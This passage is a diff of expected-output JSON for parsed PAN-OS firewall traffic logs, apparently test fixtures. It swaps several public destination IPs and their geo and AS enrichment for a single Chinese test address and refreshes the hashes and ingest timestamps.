04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10303,24 +10337,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -10339,7 +10375,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10373,7 +10409,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iSTXT01g3/K5eC8sEHIzTaFShsA=", + "community_id": "1:et0aCyMg4U52CZ4uw4VmHR75jJ8=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -10411,14 +10447,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284269999Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382007400Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10441,24 +10477,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -10477,7 +10515,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10511,7 +10549,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:3UaggcKnXvkcjpVHqbTU3mCMT5E=", + "community_id": "1:TBV7ZwcmT9bpnR8tE7B33GBmh/Y=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -10549,14 +10587,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284274560Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382012700Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10579,27 +10617,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -10618,7 +10655,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -10652,7 +10689,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=", + "community_id": "1:MRL6gXI2+bPHjOwl6jUcT9qzDE4=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -10690,14 +10727,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284279190Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382018100Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10821,7 +10858,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284288133Z", + "ingested": "2021-12-09T13:43:22.382023400Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -10845,27 +10882,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9064, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 9 }, "rule": { @@ -10884,7 +10920,7 @@ }, "packets": 12 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", "panw": { "panos": { "ruleset": "rule1", @@ -10918,7 +10954,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZM81iQMHQAIwuZHdw5tm5lXF25A=", + "community_id": "1:6faxflTwMjHGTNJk1M9nqITkJoQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -10956,14 +10992,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 3000000000, - "ingested": "2021-09-08T12:38:09.284294011Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", + "ingested": "2021-12-09T13:43:22.382028700Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -10986,27 +11022,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9124, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 10 }, "rule": { @@ -11025,7 +11060,7 @@ }, "packets": 12 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "panw": { "panos": { "ruleset": "rule1", @@ -11059,7 +11094,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:yYl3JBOjYyGDcmf0pDc+hxky9gU=", + "community_id": "1:w1dj5cwtVOsCY3apswvasEyMkrg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -11097,14 +11132,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 7000000000, - "ingested": "2021-09-08T12:38:09.284298523Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", + "ingested": "2021-12-09T13:43:22.382033900Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11228,7 +11263,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284303215Z", + "ingested": "2021-12-09T13:43:22.382039300Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11353,7 +11388,7 @@ }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284307807Z", + "ingested": "2021-12-09T13:43:22.382044500Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -11377,27 +11412,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11416,7 +11450,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11450,7 +11484,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=", + "community_id": "1:SdTb469tRCABgoEEDDEw1DSQQHs=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -11488,14 +11522,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284317081Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382075200Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11518,24 +11552,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11554,7 +11590,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11588,7 +11624,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cWkoifFGPLq+ZcxaNzzYym9H7jI=", + "community_id": "1:9iUxTHQ65OpuYpwC5gyIyZ6bZIY=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -11626,14 +11662,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284322854Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382078800Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11656,24 +11692,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11692,7 +11730,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11726,7 +11764,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:SicjKSp4oQCovx4rjFSg+IThGYA=", + "community_id": "1:SxhdeG/p1/9TuivYgKezIy0BiE0=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -11764,14 +11802,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284327399Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382082100Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11794,27 +11832,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11833,7 +11870,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -11867,7 +11904,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=", + "community_id": "1:euxf4A6kWeWGJu6MuGDs2l85ugI=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -11905,14 +11942,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284332166Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382086400Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 